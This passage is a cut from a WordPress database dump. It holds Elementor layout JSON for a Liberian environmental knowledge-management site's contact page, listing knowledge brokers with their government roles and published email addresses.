\\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(23021,3322,'_elementor_edit_mode','builder'),(23022,3322,'_elementor_template_type','wp-page'),(23023,3322,'_elementor_version','3.0.12'),(23024,3322,'_wp_page_template','default'),(23025,3322,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management 